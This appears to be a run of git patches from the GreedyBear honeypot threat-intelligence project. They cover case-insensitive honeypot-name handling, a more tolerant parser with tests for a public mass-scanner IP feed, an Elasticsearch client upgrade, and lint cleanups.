- self._honeypot_cache = {hp.name: hp.active for hp in GeneralHoneypot.objects.all()}
- self._honeypot_cache.update(dict.fromkeys(self.SPECIAL_HONEYPOTS, True))
+ self._honeypot_cache = {self._normalize_name(hp.name): hp.active for hp in GeneralHoneypot.objects.all()}
+ self._honeypot_cache.update({self._normalize_name(name): True for name in self.SPECIAL_HONEYPOTS})
+
+ def _normalize_name(self, name: str) -> str:
+ """Normalize honeypot names for consistent cache and DB usage."""
+ return name.lower().strip()
def add_honeypot_to_ioc(self, honeypot_name: str, ioc: IOC) -> IOC:
"""
@@ -47,10 +51,11 @@ def create_honeypot(self, honeypot_name: str) -> GeneralHoneypot:
Returns:
The newly created GeneralHoneypot instance.
"""
+ normalized = self._normalize_name(honeypot_name)
self.log.debug(f"creating honeypot {honeypot_name}")
honeypot = GeneralHoneypot(name=honeypot_name, active=True)
honeypot.save()
- self._honeypot_cache[honeypot_name] = True
+ self._honeypot_cache[normalized] = True
return honeypot
def get_active_honeypots(self) -> list[GeneralHoneypot]:
@@ -87,10 +92,7 @@ def get_hp_by_name(self, name: str) -> GeneralHoneypot | None:
Returns:
The matching GeneralHoneypot, or None if not found.
"""
- try:
- return GeneralHoneypot.objects.get(name=name)
- except GeneralHoneypot.DoesNotExist:
- return None
+ return GeneralHoneypot.objects.filter(name__iexact=name).first()
def is_empty(self) -> bool:
"""
@@ -113,12 +115,13 @@ def is_enabled(self, honeypot_name: str) -> bool:
Returns:
True if the honeypot is enabled, False otherwise.
"""
- return self._honeypot_cache.get(honeypot_name, False)
+ normalized = self._normalize_name(honeypot_name)
+ return self._honeypot_cache.get(normalized, False)
def is_ready_for_extraction(self, honeypot_name: str) -> bool:
"""
Check if a honeypot is ready for data extraction.
- Creates the honeypot if it doesn't exist, then checks if it's enabled.
+ Loads the honeypot if it doesn't exist, then checks if it's enabled.
Args:
honeypot_name: Name of the honeypot to check.
@@ -126,7 +129,8 @@ def is_ready_for_extraction(self, honeypot_name: str) -> bool:
Returns:
True if the honeypot exists and is enabled, False otherwise.
"""
- if honeypot_name not in self._honeypot_cache:
+ normalized = self._normalize_name(honeypot_name)
+ if normalized not in self._honeypot_cache:
self.create_honeypot(honeypot_name)
return self.is_enabled(honeypot_name)
diff --git a/greedybear/migrations/0027_disable_unwanted_honeypots.py b/greedybear/migrations/0027_disable_unwanted_honeypots.py
new file mode 100644
index 00000000..0b547db7
--- /dev/null
+++ b/greedybear/migrations/0027_disable_unwanted_honeypots.py
@@ -0,0 +1,34 @@
+from django.db import migrations
+
+
+def disable_unwanted_honeypots(apps, schema_editor):
+ """
+ Ensure unwanted honeypots exist and are disabled.
+ """
+ GeneralHoneypot = apps.get_model("greedybear", "GeneralHoneypot")
+
+ unwanted = [
+ "Ddospot",
+ "ssh-rsa",
+ "NGINX",
+ ]
+
+ for name in unwanted:
+ GeneralHoneypot.objects.get_or_create(
+ name=name,
+ defaults={"active": False},
+ )
+
+
+class Migration(migrations.Migration):
+
+ dependencies = [
+ ("greedybear", "0026_fix_charfield_null_true"),
+ ]
+
+ operations = [
+ migrations.RunPython(
+ disable_unwanted_honeypots,
+ reverse_code=migrations.RunPython.noop,
+ ),
+ ]
diff --git a/tests/test_repositories.py b/tests/test_repositories.py
index 2aa7526d..ad943656 100644
--- a/tests/test_repositories.py
+++ b/tests/test_repositories.py
@@ -136,17 +136,44 @@ def test_add_honeypot_to_ioc_multiple_honeypots(self):
self.assertIn(hp2, ioc.general_honeypot.all())
def test_existing_honeypots(self):
- self.assertIn("Cowrie", self.repo._honeypot_cache)
- self.assertIn("Log4pot", self.repo._honeypot_cache)
- self.assertIn("Heralding", self.repo._honeypot_cache)
- self.assertIn("Ciscoasa", self.repo._honeypot_cache)
- self.assertIn("Ddospot", self.repo._honeypot_cache)
+ expected_honeypots = ["Cowrie", "Log4pot", "Heralding", "Ciscoasa", "Ddospot"]
+ for hp_name in expected_honeypots:
+ self.assertIn(self.repo._normalize_name(hp_name), self.repo._honeypot_cache)
def test_is_ready_for_extraction_creates_and_enables(self):
result = self.repo.is_ready_for_extraction("FooPot")
self.assertTrue(result)
self.assertTrue(GeneralHoneypot.objects.filter(name="FooPot").exists())
+ def test_is_ready_for_extraction_case_insensitive(self):
+ GeneralHoneypot.objects.create(name="Cowrie", active=True)
+ result = self.repo.is_ready_for_extraction("cowrie")
+ self.assertTrue(result)
+ self.assertEqual(GeneralHoneypot.objects.filter(name__iexact="cowrie").count(), 1)
+
+ def test_get_hp_by_name_insensitive(self):
+ GeneralHoneypot.objects.create(name="Cowrie", active=True)
+ result = self.repo.get_hp_by_name("cowrie")
+ self.assertIsNotNone(result)
+
+ def test_disabled_honeypot_case_insensitive(self):
+ GeneralHoneypot.objects.create(name="Heralding", active=False)
+
+ # reiniting repo after DB change to refresh the cache
+ repo = IocRepository()
+ result = repo.is_ready_for_extraction("heralding")
+ self.assertFalse(result)
+
+ def test_special_and_normal_honeypots(self):
+ GeneralHoneypot.objects.create(name="NormalPot", active=False)
+
+ repo = IocRepository()
+
+ self.assertTrue(repo.is_ready_for_extraction("cowrie"))
+ self.assertTrue(repo.is_ready_for_extraction("Log4Pot"))
+ self.assertFalse(repo.is_ready_for_extraction("NormalPot"))
+ self.assertFalse(repo.is_ready_for_extraction("normalpot"))
+
class TestSensorRepository(CustomTestCase):
def setUp(self):
From bdf1a1874f6fcc124957c40c64d5cb63005966fa Mon Sep 17 00:00:00 2001
From: Krishna Awasthi <140143710+opbot-xd@users.noreply.github.com>
Date: Thu, 8 Jan 2026 20:52:35 +0530
Subject: [PATCH 34/75] fix: Refactor MassScannersCron to handle flexible IP
formats. Closes #678 (#685)
* fix: refactor MassScannersCron to handle flexible IP formats
- Added is_valid_ipv4() utility function in extraction/utils.py for
centralized IPv4 validation following DRY principle
- Refactored get_ioc_type() to use the new is_valid_ipv4() utility
- Updated MassScannersCron to use flexible regex pattern that
extracts IP candidates and validates them programmatically
- Changed log level from WARNING to DEBUG for non-IP lines since
external data sources naturally contain various formats (IPv6,
plain IPs without comments, other strings)
- Added comprehensive tests for is_valid_ipv4() covering edge cases:
* Valid IPs with/without whitespace
* Out-of-range octets (>255)
* Incomplete/malformed IPs
* IPv6 addresses (correctly rejected)
* Random strings and special characters
- Added MassScannersCron integration tests using real-world examples:
* Plain IPs without comments
* IPs with comments (various formats)
* IPv6 addresses (should be skipped)
* Invalid strings like /w00tw00t.at.ISC.SANS.DFind:)
* Mixed valid/invalid data
All tests pass (67 total: 52 extraction utils + 15 mass scanners)
Fixes issues with 'unexpected line' warnings for valid data formats
that don't match the old strict regex pattern
* refactor: address code review feedback
- Remove redundant re.DOTALL flag from comment_regex
Since we process line-by-line with iter_lines(), multi-line comments
cannot occur (newlines are delimiters, not content). Flag is unnecessary.
- Move logging after save() to avoid misleading logs if DB operation fails
Ensures we only log on successful database saves
---
greedybear/cronjobs/extraction/utils.py | 27 ++-
greedybear/cronjobs/mass_scanners.py | 46 +++--
tests/test_extraction_utils.py | 129 ++++++++++++++
tests/test_mass_scanners.py | 227 ++++++++++++++++++++++++
4 files changed, 410 insertions(+), 19 deletions(-)
create mode 100644 tests/test_mass_scanners.py
diff --git a/greedybear/cronjobs/extraction/utils.py b/greedybear/cronjobs/extraction/utils.py
index b176ec79..31de9e2d 100644
--- a/greedybear/cronjobs/extraction/utils.py
+++ b/greedybear/cronjobs/extraction/utils.py
@@ -131,6 +131,24 @@ def iocs_from_hits(hits: list[dict]) -> list[IOC]:
return iocs
+def is_valid_ipv4(candidate: str) -> tuple[bool, str | None]:
+ """
+ Validate if a string is a valid IPv4 address.
+
+ Args:
+ candidate: String to validate as IPv4 address.
+
+ Returns:
+ Tuple of (is_valid, cleaned_ip). If valid, cleaned_ip is the stripped
+ IP address; otherwise, it is None.
+ """
+ try:
+ IPv4Address(candidate.strip())
+ return True, candidate.strip()
+ except ValueError:
+ return False, None
+
+
def get_ioc_type(ioc: str) -> str:
"""
Determine the type of an IOC based on its format.
@@ -141,13 +159,8 @@ def get_ioc_type(ioc: str) -> str:
Returns:
IP if the value is a valid IPv4 address, DOMAIN otherwise.
"""
- try:
- IPv4Address(ioc)
- except ValueError:
- ioc_type = DOMAIN
- else:
- ioc_type = IP
- return ioc_type
+ is_valid, _ = is_valid_ipv4(ioc)
+ return IP if is_valid else DOMAIN
def threatfox_submission(ioc_record: IOC, related_urls: list, log: Logger) -> None:
diff --git a/greedybear/cronjobs/mass_scanners.py b/greedybear/cronjobs/mass_scanners.py
index 2a8a7275..b6bb65a4 100644
--- a/greedybear/cronjobs/mass_scanners.py
+++ b/greedybear/cronjobs/mass_scanners.py
@@ -3,12 +3,17 @@
import requests
from greedybear.cronjobs.base import Cronjob
+from greedybear.cronjobs.extraction.utils import is_valid_ipv4
from greedybear.models import IOC, MassScanner
class MassScannersCron(Cronjob):
def run(self) -> None:
- regex_compiled = re.compile(r"(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})\s*#\s*(.+)*", re.DOTALL)
+ # Simple regex to extract potential IPv4 addresses
+ ip_candidate_regex = re.compile(r"(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})")
+ # Regex to extract optional comment/reason after '#'
+ comment_regex = re.compile(r"#\s*(.+)")
+
r = requests.get(
"https://raw.githubusercontent.com/stamparm/maltrail/master/trails/static/mass_scanner.txt",
timeout=10,
@@ -18,17 +23,34 @@ def run(self) -> None:
line = line_bytes.decode("utf-8")
if not line or line.startswith("#"):
continue
- if match := re.match(regex_compiled, line):
- ip_address = match.group(1)
- reason = match.group(2)
- try:
- MassScanner.objects.get(ip_address=ip_address)
- except MassScanner.DoesNotExist:
- self.log.info(f"added new mass scanner {ip_address}")
- MassScanner(ip_address=ip_address, reason=reason).save()
- self._update_old_ioc(ip_address)
- else:
- self.log.warning(f"unexpected line: {line}")
+
+ # Try to extract IP candidate from the line
+ ip_match = ip_candidate_regex.search(line)
+ if not ip_match:
+ # No IP-like pattern found, log at DEBUG level
+ self.log.debug(f"No IP pattern found in line: {line}")
+ continue
+
+ # Validate the extracted candidate
+ is_valid, ip_address = is_valid_ipv4(ip_match.group(1))
+ if not is_valid:
+ # Not a valid IPv4, log at DEBUG level
+ self.log.debug(f"Invalid IPv4 address in line: {line}")
+ continue
+
+ # Extract optional comment/reason
+ reason = ""
+ comment_match = comment_regex.search(line)
+ if comment_match:
+ reason = comment_match.group(1)
+
+ # Add or update mass scanner entry
+ try:
+ MassScanner.objects.get(ip_address=ip_address)
+ except MassScanner.DoesNotExist:
+ self.log.info(f"added new mass scanner {ip_address}")
+ MassScanner(ip_address=ip_address, reason=reason).save()
+ self._update_old_ioc(ip_address)
def _update_old_ioc(self, ip_address):
try:
diff --git a/tests/test_extraction_utils.py b/tests/test_extraction_utils.py
index 77a218a6..200794d7 100644
--- a/tests/test_extraction_utils.py
+++ b/tests/test_extraction_utils.py
@@ -6,6 +6,7 @@
correct_ip_reputation,
get_ioc_type,
iocs_from_hits,
+ is_valid_ipv4,
is_whatsmyip_domain,
threatfox_submission,
)
@@ -34,6 +35,134 @@ def test_invalid_ip_returns_domain(self):
self.assertEqual(get_ioc_type("1.2.3"), DOMAIN)
+class TestIsValidIpv4(CustomTestCase):
+ def test_valid_ipv4_returns_true_and_cleaned_ip(self):
+ is_valid, ip = is_valid_ipv4("1.2.3.4")
+ self.assertTrue(is_valid)
+ self.assertEqual(ip, "1.2.3.4")
+
+ def test_valid_ipv4_edge_cases(self):
+ # Test boundary values
+ is_valid, ip = is_valid_ipv4("0.0.0.0")
+ self.assertTrue(is_valid)
+ self.assertEqual(ip, "0.0.0.0")
+
+ is_valid, ip = is_valid_ipv4("255.255.255.255")
+ self.assertTrue(is_valid)
+ self.assertEqual(ip, "255.255.255.255")
+
+ is_valid, ip = is_valid_ipv4("192.168.1.1")
+ self.assertTrue(is_valid)
+ self.assertEqual(ip, "192.168.1.1")
+
+ def test_ipv4_with_whitespace_strips_and_validates(self):
+ # Test leading whitespace
+ is_valid, ip = is_valid_ipv4(" 1.2.3.4")
+ self.assertTrue(is_valid)
+ self.assertEqual(ip, "1.2.3.4")
+
+ # Test trailing whitespace
+ is_valid, ip = is_valid_ipv4("1.2.3.4 ")
+ self.assertTrue(is_valid)
+ self.assertEqual(ip, "1.2.3.4")
+
+ # Test both
+ is_valid, ip = is_valid_ipv4(" 1.2.3.4 ")
+ self.assertTrue(is_valid)
+ self.assertEqual(ip, "1.2.3.4")
+
+ def test_invalid_ipv4_out_of_range_octets(self):
+ # Test octets > 255
+ is_valid, ip = is_valid_ipv4("256.1.1.1")
+ self.assertFalse(is_valid)
+ self.assertIsNone(ip)
+
+ is_valid, ip = is_valid_ipv4("1.256.1.1")
+ self.assertFalse(is_valid)
+ self.assertIsNone(ip)
+
+ is_valid, ip = is_valid_ipv4("1.1.256.1")
+ self.assertFalse(is_valid)
+ self.assertIsNone(ip)
+
+ is_valid, ip = is_valid_ipv4("1.1.1.256")
+ self.assertFalse(is_valid)
+ self.assertIsNone(ip)
+
+ is_valid, ip = is_valid_ipv4("999.999.999.999")
+ self.assertFalse(is_valid)
+ self.assertIsNone(ip)
+
+ def test_invalid_ipv4_incomplete_format(self):
+ # Too few octets
+ is_valid, ip = is_valid_ipv4("1.2.3")
+ self.assertFalse(is_valid)
+ self.assertIsNone(ip)
+
+ is_valid, ip = is_valid_ipv4("1.2")
+ self.assertFalse(is_valid)
+ self.assertIsNone(ip)
+
+ is_valid, ip = is_valid_ipv4("1")
+ self.assertFalse(is_valid)
+ self.assertIsNone(ip)
+
+ def test_invalid_ipv4_too_many_octets(self):
+ is_valid, ip = is_valid_ipv4("1.2.3.4.5")
+ self.assertFalse(is_valid)
+ self.assertIsNone(ip)
+
+ def test_invalid_ipv4_domains(self):
+ is_valid, ip = is_valid_ipv4("example.com")
+ self.assertFalse(is_valid)
+ self.assertIsNone(ip)
+
+ is_valid, ip = is_valid_ipv4("sub.example.com")
+ self.assertFalse(is_valid)
+ self.assertIsNone(ip)
+
+ def test_invalid_ipv4_ipv6_addresses(self):
+ # IPv6 should not be valid for IPv4 validation
+ is_valid, ip = is_valid_ipv4("2001:0db8:85a3::8a2e:0370:7334")
+ self.assertFalse(is_valid)
+ self.assertIsNone(ip)
+
+ is_valid, ip = is_valid_ipv4("::1")
+ self.assertFalse(is_valid)
+ self.assertIsNone(ip)
+
+ def test_invalid_ipv4_random_strings(self):
+ is_valid, ip = is_valid_ipv4("/w00tw00t.at.ISC.SANS.DFind:)")
+ self.assertFalse(is_valid)
+ self.assertIsNone(ip)
+
+ is_valid, ip = is_valid_ipv4("not an ip")
+ self.assertFalse(is_valid)
+ self.assertIsNone(ip)
+
+ is_valid, ip = is_valid_ipv4("")
+ self.assertFalse(is_valid)
+ self.assertIsNone(ip)
+
+ def test_invalid_ipv4_special_characters(self):
+ is_valid, ip = is_valid_ipv4("1.2.3.4#comment")
+ self.assertFalse(is_valid)
+ self.assertIsNone(ip)
+
+ is_valid, ip = is_valid_ipv4("1.2.3.4 # comment")
+ self.assertFalse(is_valid)
+ self.assertIsNone(ip)
+
+ def test_invalid_ipv4_negative_numbers(self):
+ is_valid, ip = is_valid_ipv4("-1.2.3.4")
+ self.assertFalse(is_valid)
+ self.assertIsNone(ip)
+
+ is_valid, ip = is_valid_ipv4("1.-2.3.4")
+ self.assertFalse(is_valid)
+ self.assertIsNone(ip)
+
+
class TestIsWhatsmyipDomain(CustomTestCase):
def test_returns_true_for_known_domain(self):
WhatsMyIPDomain.objects.create(domain="some.domain.com")
diff --git a/tests/test_mass_scanners.py b/tests/test_mass_scanners.py
new file mode 100644
index 00000000..278127ab
--- /dev/null
+++ b/tests/test_mass_scanners.py
@@ -0,0 +1,227 @@
+from unittest.mock import Mock, patch
+
+from greedybear.cronjobs.mass_scanners import MassScannersCron
+from greedybear.models import MassScanner
+
+from . import CustomTestCase
+
+
+class TestMassScannersCron(CustomTestCase):
+ def setUp(self):
+ self.cron = MassScannersCron()
+ self.cron.log = Mock()
+
+ def _create_mock_response(self, lines):
+ """Create a mock response object that iter_lines() can use."""
+ mock_response = Mock()
+ mock_response.iter_lines.return_value = [line.encode("utf-8") for line in lines]
+ return mock_response
+
+ def test_parses_ip_with_comment(self):
+ """Test parsing IP address with comment after #"""
+ lines = ["192.168.1.100 # normal comment"]
+ with patch("greedybear.cronjobs.mass_scanners.requests.get") as mock_get:
+ mock_get.return_value = self._create_mock_response(lines)
+ self.cron.run()
+
+ # Should create a mass scanner entry
+ scanner = MassScanner.objects.get(ip_address="192.168.1.100")
+ self.assertEqual(scanner.reason, "normal comment")
+ self.cron.log.info.assert_called_once()
+
+ def test_parses_plain_ip_without_comment(self):
+ """Test parsing plain IP address without any comment"""
+ lines = ["45.83.67.252"]
+ with patch("greedybear.cronjobs.mass_scanners.requests.get") as mock_get:
+ mock_get.return_value = self._create_mock_response(lines)
+ self.cron.run()
+
+ # Should create entry with empty reason
+ scanner = MassScanner.objects.get(ip_address="45.83.67.252")
+ self.assertEqual(scanner.reason, "")
+ self.cron.log.info.assert_called_once()
+
+ def test_parses_ip_with_multiple_hash_signs(self):
+ """Test parsing IP with comment containing # symbols"""
+ lines = ["1.1.1.1 # comment with # spaces"]
+ with patch("greedybear.cronjobs.mass_scanners.requests.get") as mock_get:
+ mock_get.return_value = self._create_mock_response(lines)
+ self.cron.run()
+
+ scanner = MassScanner.objects.get(ip_address="1.1.1.1")
+ self.assertEqual(scanner.reason, "comment with # spaces")
+
+ def test_parses_ip_without_space_before_comment(self):
+ """Test parsing IP with comment but no space before #"""
+ lines = ["1.1.1.1#comment_without_space"]
+ with patch("greedybear.cronjobs.mass_scanners.requests.get") as mock_get:
+ mock_get.return_value = self._create_mock_response(lines)
+ self.cron.run()
+
+ scanner = MassScanner.objects.get(ip_address="1.1.1.1")
+ self.assertEqual(scanner.reason, "comment_without_space")
+
+ def test_skips_ipv6_addresses(self):
+ """Test that IPv6 addresses are skipped (logged at DEBUG level)"""
+ lines = [
+ "2001:0db8:85a3::8a2e:0370:7334 # full IPv6",
+ "2001:db8::1 # compressed IPv6",
+ "fe80::1ff:fe23:4567:890a # link-local",
+ ]
+ with patch("greedybear.cronjobs.mass_scanners.requests.get") as mock_get:
+ mock_get.return_value = self._create_mock_response(lines)
+ self.cron.run()
+
+ # Should not create any entries
+ self.assertEqual(MassScanner.objects.count(), 0)
+ # Should log at DEBUG level
+ self.assertEqual(self.cron.log.debug.call_count, 3)
+
+ def test_skips_invalid_strings(self):
+ """Test that invalid strings like URLs are skipped (logged at DEBUG)"""
+ lines = [
+ "/w00tw00t.at.ISC.SANS.DFind:)",
+ "",
+ "abc.def.ghi.jkl",
+ ]
+ with patch("greedybear.cronjobs.mass_scanners.requests.get") as mock_get:
+ mock_get.return_value = self._create_mock_response(lines)
+ self.cron.run()
+
+ self.assertEqual(MassScanner.objects.count(), 0)
+ self.assertEqual(self.cron.log.debug.call_count, 3)
+
+ def test_skips_invalid_ip_out_of_range(self):
+ """Test that IPs with octets >255 are skipped"""
+ lines = ["999.999.999.999 # structurally matches but invalid IP"]
+ with patch("greedybear.cronjobs.mass_scanners.requests.get") as mock_get:
+ mock_get.return_value = self._create_mock_response(lines)
+ self.cron.run()
+
+ self.assertEqual(MassScanner.objects.count(), 0)
+ self.cron.log.debug.assert_called_once()
+
+ def test_skips_comment_only_lines(self):
+ """Test that lines starting with # are skipped"""
+ lines = [
+ "# This is a comment",
+ "## Another comment",
+ ]
+ with patch("greedybear.cronjobs.mass_scanners.requests.get") as mock_get:
+ mock_get.return_value = self._create_mock_response(lines)
+ self.cron.run()
+
+ self.assertEqual(MassScanner.objects.count(), 0)
+ # Should not log anything (skipped before processing)
+ self.cron.log.debug.assert_not_called()
+
+ def test_skips_empty_lines(self):
+ """Test that empty lines are skipped"""
+ lines = ["", " ", "\n"]
+ with patch("greedybear.cronjobs.mass_scanners.requests.get") as mock_get:
+ mock_get.return_value = self._create_mock_response(lines)
+ self.cron.run()
+
+ self.assertEqual(MassScanner.objects.count(), 0)
+
+ def test_handles_mixed_valid_and_invalid_lines(self):
+ """Test processing a mix of valid IPs, IPv6, and invalid strings"""
+ lines = [
+ "# Comment header",
+ "192.168.1.100 # normal comment",
+ "10.0.0.5#server",
+ "2001:db8::1 # IPv6 - should skip",
+ "/w00tw00t.at.ISC.SANS.DFind:)",
+ "45.83.67.252",
+ "999.999.999.999",
+ "193.142.146.101",
+ ]
+ with patch("greedybear.cronjobs.mass_scanners.requests.get") as mock_get:
+ mock_get.return_value = self._create_mock_response(lines)
+ self.cron.run()
+
+ # Should only create 4 valid entries
+ self.assertEqual(MassScanner.objects.count(), 4)
+
+ # Verify the valid IPs were added
+ MassScanner.objects.get(ip_address="192.168.1.100")
+ MassScanner.objects.get(ip_address="10.0.0.5")
+ MassScanner.objects.get(ip_address="45.83.67.252")
+ MassScanner.objects.get(ip_address="193.142.146.101")
+
+ def test_does_not_duplicate_existing_entries(self):
+ """Test that existing mass scanner entries are not duplicated"""
+ # Create existing entry
+ MassScanner.objects.create(ip_address="1.2.3.4", reason="existing")
+
+ lines = ["1.2.3.4 # new comment"]
+ with patch("greedybear.cronjobs.mass_scanners.requests.get") as mock_get:
+ mock_get.return_value = self._create_mock_response(lines)
+ self.cron.run()
+
+ # Should still only have one entry with original reason
+ self.assertEqual(MassScanner.objects.count(), 1)
+ scanner = MassScanner.objects.get(ip_address="1.2.3.4")
+ self.assertEqual(scanner.reason, "existing")
+ # Should not log "added new mass scanner"
+ self.cron.log.info.assert_not_called()
+
+ def test_parses_broadcast_and_special_ips(self):
+ """Test parsing special IPs like broadcast, localhost, etc."""
+ lines = [
+ "255.255.255.255 # broadcast",
+ "127.0.0.1 # localhost",
+ "0.0.0.0 # all interfaces",
+ ]
+ with patch("greedybear.cronjobs.mass_scanners.requests.get") as mock_get:
+ mock_get.return_value = self._create_mock_response(lines)
+ self.cron.run()
+
+ # All are valid IPv4 addresses, so they should be added
+ self.assertEqual(MassScanner.objects.count(), 3)
+ MassScanner.objects.get(ip_address="255.255.255.255")
+ MassScanner.objects.get(ip_address="127.0.0.1")
+ MassScanner.objects.get(ip_address="0.0.0.0")
+
+ def test_handles_partial_ips(self):
+ """Test that incomplete IP addresses are skipped"""
+ lines = [
+ "192.168.1",
+ "123.456.78",
+ "1.2",
+ ]
+ with patch("greedybear.cronjobs.mass_scanners.requests.get") as mock_get:
+ mock_get.return_value = self._create_mock_response(lines)
+ self.cron.run()
+
+ self.assertEqual(MassScanner.objects.count(), 0)
+ # All should be logged at DEBUG level
+ self.assertEqual(self.cron.log.debug.call_count, 3)
+
+ def test_extracts_ip_from_beginning_of_line(self):
+ """Test that IP is correctly extracted when at start of line"""
+ lines = ["45.83.67.252"]
+ with patch("greedybear.cronjobs.mass_scanners.requests.get") as mock_get:
+ mock_get.return_value = self._create_mock_response(lines)
+ self.cron.run()
+
+ scanner = MassScanner.objects.get(ip_address="45.83.67.252")
+ self.assertEqual(scanner.reason, "")
+
+ def test_handles_c_class_network_patterns(self):
+ """Test handling of IPs with prefix characters"""
+ lines = [
+ "C91.196.152.28 # probe.onyphe.net",
+ "C91.196.152.38 # probe.onyphe.net",
+ ]
+ with patch("greedybear.cronjobs.mass_scanners.requests.get") as mock_get:
+ mock_get.return_value = self._create_mock_response(lines)
+ self.cron.run()
+
+ # The regex should extract the valid IP part (91.196.152.28)
+ # even though there's a 'C' prefix
+ self.assertEqual(MassScanner.objects.count(), 2)
+ scanner1 = MassScanner.objects.get(ip_address="91.196.152.28")
+ scanner2 = MassScanner.objects.get(ip_address="91.196.152.38")
+ self.assertEqual(scanner1.reason, "probe.onyphe.net")
+ self.assertEqual(scanner2.reason, "probe.onyphe.net")
From f98362021508824febe5e485c6d50d82194be6dd Mon Sep 17 00:00:00 2001
From: tim <46972822+regulartim@users.noreply.github.com>
Date: Fri, 9 Jan 2026 12:57:41 +0100
Subject: [PATCH 35/75] Bump elasticsearch client to version 9.x. Closes #690
(#691)
* update development container of elasticsearch
* bump elasticsearch version
---
docker/elasticsearch.yml | 2 +-
greedybear/cronjobs/repositories/elastic.py | 2 +-
greedybear/settings.py | 2 +-
requirements/project-requirements.txt | 2 +-
4 files changed, 4 insertions(+), 4 deletions(-)
diff --git a/docker/elasticsearch.yml b/docker/elasticsearch.yml
index deadb139..054c7449 100644
--- a/docker/elasticsearch.yml
+++ b/docker/elasticsearch.yml
@@ -4,7 +4,7 @@ services:
- elasticsearch
elasticsearch:
- image: docker.elastic.co/elasticsearch/elasticsearch:8.15.0
+ image: docker.elastic.co/elasticsearch/elasticsearch:9.2.3
environment:
- "discovery.type=single-node"
diff --git a/greedybear/cronjobs/repositories/elastic.py b/greedybear/cronjobs/repositories/elastic.py
index e62cdc48..e3b24b18 100644
--- a/greedybear/cronjobs/repositories/elastic.py
+++ b/greedybear/cronjobs/repositories/elastic.py
@@ -2,7 +2,7 @@
from datetime import datetime, timedelta
from django.conf import settings
-from elasticsearch8.dsl import Q, Search
+from elasticsearch.dsl import Q, Search
from greedybear.consts import REQUIRED_FIELDS
from greedybear.settings import EXTRACTION_INTERVAL, LEGACY_EXTRACTION
diff --git a/greedybear/settings.py b/greedybear/settings.py
index f9c592b8..e07cdfdf 100644
--- a/greedybear/settings.py
+++ b/greedybear/settings.py
@@ -6,7 +6,7 @@
from datetime import timedelta
from django.core.management.utils import get_random_secret_key
-from elasticsearch8 import Elasticsearch
+from elasticsearch import Elasticsearch
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
BASE_STATIC_PATH = os.path.join(BASE_DIR, "static/")
diff --git a/requirements/project-requirements.txt b/requirements/project-requirements.txt
index bf6f63a3..9c1ed53a 100644
--- a/requirements/project-requirements.txt
+++ b/requirements/project-requirements.txt
@@ -1,7 +1,7 @@
celery==5.6.2
# if you change this, update the documentation
-elasticsearch8==8.19.3
+elasticsearch==9.2.1
Django==5.2.10
djangorestframework==3.16.1
From f3553653843989a891424fa58a0276c6bf472a30 Mon Sep 17 00:00:00 2001
From: Krishna Awasthi <140143710+opbot-xd@users.noreply.github.com>
Date: Fri, 9 Jan 2026 20:04:03 +0530
Subject: [PATCH 36/75] refactor: cleanup ruff ignores and fix N818. Closes
#640 (#692)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
* refactor: cleanup ruff ignores and fix N818
- Rename ElasticServerDownException → ElasticServerDownError (N818)
- Remove N804, N818, UP008, UP031 from ignores as they are fixed
- Codebase is now compliant with these rules
* refactor: cleanup ruff ignores, fix N818 and C408
- Rename ElasticServerDownException → ElasticServerDownError (N818)
- Replace dict() with {} (C408)
- Remove N804, N818, UP008, UP031, C401, C408 from ignores
- Codebase is now compliant with these rules
- Verified all checks pass with explicit config
---
.github/configurations/python_linters/.ruff.toml | 13 -------------
api/views/utils.py | 2 +-
greedybear/cronjobs/repositories/elastic.py | 10 +++++-----
tests/test_repositories.py | 2 +-
4 files changed, 7 insertions(+), 20 deletions(-)
diff --git a/.github/configurations/python_linters/.ruff.toml b/.github/configurations/python_linters/.ruff.toml
index 3b513404..12daab7d 100644
--- a/.github/configurations/python_linters/.ruff.toml
+++ b/.github/configurations/python_linters/.ruff.toml
@@ -53,19 +53,6 @@ select = [
ignore = [
# F403: Allow wildcard imports in __init__.py files
"F403",
- # C401/C408: Allow dict() and generator patterns (style preference)
- "C401",
- "C408",
# E501: Allow long lines in docstrings
"E501",
-
- # N804: Allow 'self' in class methods for Django test compatibility
- "N804",
-
- # N818: Allow existing exception naming
- "N818",
- # UP008: Allow explicit super() in tests for clarity
- "UP008",
- # UP031: Allow old-style % formatting in tests
- "UP031",
]
diff --git a/api/views/utils.py b/api/views/utils.py
index 7d4d8c66..87face9d 100644
--- a/api/views/utils.py
+++ b/api/views/utils.py
@@ -80,7 +80,7 @@ def __init__(self, query_params: dict):
def apply_default_filters(self, query_params):
if not query_params:
- query_params = dict()
+ query_params = {}
if "include_mass_scanners" not in query_params:
self.exclude_reputation.append("mass scanner")
if "include_tor_exit_nodes" not in query_params:
diff --git a/greedybear/cronjobs/repositories/elastic.py b/greedybear/cronjobs/repositories/elastic.py
index e3b24b18..6895472d 100644
--- a/greedybear/cronjobs/repositories/elastic.py
+++ b/greedybear/cronjobs/repositories/elastic.py
@@ -18,7 +18,7 @@ class ElasticRepository:
This class is intended for individual extraction runs, so the cache never clears.
"""
- class ElasticServerDownException(Exception):
+ class ElasticServerDownError(Exception):
"""Raised when the Elasticsearch server is unreachable."""
pass
@@ -27,7 +27,7 @@ def __init__(self):
"""Initialize the repository with an Elasticsearch client and empty cache."""
self.log = logging.getLogger(f"{__name__}.{self.__class__.__name__}")
self.elastic_client = settings.ELASTIC_CLIENT
- self.search_cache = dict()
+ self.search_cache = {}
def has_honeypot_been_hit(self, minutes_back_to_lookup: int, honeypot_name: str) -> bool:
"""
@@ -62,7 +62,7 @@ def search(self, minutes_back_to_lookup: int) -> list:
list: Log entries sorted by @timestamp, containing only REQUIRED_FIELDS.
Raises:
- ElasticServerDownException: If Elasticsearch is unreachable.
+ ElasticServerDownError: If Elasticsearch is unreachable.
"""
if minutes_back_to_lookup in self.search_cache:
self.log.debug("fetching elastic search result from cache")
@@ -120,11 +120,11 @@ def _healthcheck(self):
Verify Elasticsearch connectivity.
Raises:
- ElasticServerDownException: If the server does not respond to ping.
+ ElasticServerDownError: If the server does not respond to ping.
"""
self.log.debug("performing healthcheck")
if not self.elastic_client.ping():
- raise self.ElasticServerDownException("elastic server is not reachable, could be down")
+ raise self.ElasticServerDownError("elastic server is not reachable, could be down")
self.log.debug("elastic server is reachable")
diff --git a/tests/test_repositories.py b/tests/test_repositories.py
index ad943656..7544f232 100644
--- a/tests/test_repositories.py
